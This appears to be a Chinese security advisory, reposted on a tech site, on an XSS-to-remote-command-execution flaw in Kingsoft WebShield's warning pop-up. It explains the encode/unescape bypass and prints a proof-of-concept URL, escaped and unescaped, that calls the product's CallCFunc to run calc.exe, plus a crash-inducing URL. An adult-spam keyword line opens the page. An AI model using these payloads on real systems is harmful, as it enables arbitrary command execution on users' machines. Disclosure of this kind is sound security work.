自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

金山網(wǎng)盾遠程代碼執(zhí)行漏洞及其它bug

安全
由于金山網(wǎng)盾對惡意地址的處理不嚴(yán),攻擊者通過構(gòu)造一個普通的掛馬頁面和一個特殊的URL,可以使操作系統(tǒng)執(zhí)行任何命令。

由于金山網(wǎng)盾對惡意地址的處理不嚴(yán),攻擊者通過構(gòu)造一個普通的掛馬頁面和一個特殊的URL,可以使操作系統(tǒng)執(zhí)行任何命令。

受影響的系統(tǒng):

截至本文發(fā)布起的當(dāng)前最新版本及其之前版本。

細節(jié):

金山網(wǎng)盾的惡意提示部分UI是用網(wǎng)頁代碼編寫的,在kwstray.exe得到惡意網(wǎng)址的時候,由于其處理方式的錯誤導(dǎo)致了XSS漏洞,同時利用軟件中實現(xiàn)的某些功能,可以執(zhí)行任何系統(tǒng)命令。具體分析如下:

在接收到惡意網(wǎng)址后,kwstray.exe采用了如下流程對字符進行了過濾處理

惡意網(wǎng)址 ——> HtmlEncode ——> unescape ——> 顯示惡意信息

這個時候,假如攻擊者估計在網(wǎng)址中包含html標(biāo)簽,那么很可能會導(dǎo)致XSS攻擊。不過由于惡意網(wǎng)址首先進行了HtmlEncode處理,直接傳入<script>之類的html標(biāo)簽會被過濾成[script],這樣便使我們的攻擊失敗。繞過的方法為:首先將html標(biāo)簽進行escape,這樣在進行HtmlEncode的時候網(wǎng)址不會有任何的改變,再經(jīng)過unescapehtml標(biāo)簽得到了還原,得以成功的插入js代碼。具體的利用如下:

    首先構(gòu)造一個惡意的頁面,該頁面可以是一個普通的掛馬頁面,只要能被金山網(wǎng)盾識別為惡意就行。

    然后構(gòu)造一個惡意的url,里面包含我們要插入的html代碼

http://localhost/index.php?html=<p style="background:url(javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' ))">test</p>

    接著將urlhtml部分進行escape加密

http://localhost/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e

    讓瀏覽器去訪問該惡意地址,這個時候網(wǎng)盾檢測到網(wǎng)頁中包含有惡意代碼,于是將惡意地址報告給WebShield服務(wù),WebShield服務(wù)接受到信息后啟動一個kwstray.exe實例,并且將惡意地址附帶上;kwstray.exe將得到的地址進行HtmlEncode處理,然后再進行unescape,最后將內(nèi)容打印給用戶,這個時候html標(biāo)簽成功插入網(wǎng)頁中,并且開始執(zhí)行惡意代碼,彈出我們的計算器程序。

    在惡意地址中有如下js代碼。

javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' )

CallCFunc是網(wǎng)盾自己實現(xiàn)的用于執(zhí)行程序的函數(shù),比如綠色氣泡彈出的時候,如果點擊確定,網(wǎng)頁中的js會調(diào)用CallCFunc函數(shù)執(zhí)行kwsmain.exe進程,用于啟動配置界面。所以我們可以直接利用此函數(shù)運行我們的程序和命令。

其它:

    金山網(wǎng)盾在對惡意地址進行解碼的時候,處理不當(dāng),通過傳入特殊的url,可以使瀏覽器崩潰。最簡單的崩潰方式:

http://localhost/index.php?test=a%

   當(dāng)網(wǎng)盾在url中發(fā)現(xiàn)%號的時候,它會嘗試著去進行解碼,在解碼過程中會導(dǎo)致崩潰。

責(zé)任編輯:王文文 來源: inking的自留地
相關(guān)推薦

2021-01-26 10:00:45

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2015-03-06 15:31:01

2021-03-09 09:06:33

PythonBug漏洞

2009-09-16 14:04:13

傲游金山網(wǎng)盾版金山傲游

2010-06-04 12:22:30

2019-05-15 15:20:01

微軟漏洞防護

2020-10-08 13:44:27

漏洞

2011-08-04 13:53:04

2017-08-22 13:45:27

2014-08-27 16:22:19

2014-09-12 17:47:36

2015-04-30 08:11:40

2023-12-14 16:20:09

2016-04-29 10:58:13

2014-10-29 15:44:55

2017-06-15 17:28:36

2017-08-15 17:39:52

2015-06-18 10:49:31

2010-01-26 11:12:09

2015-04-16 09:49:04

點贊
收藏

51CTO技術(shù)棧公眾號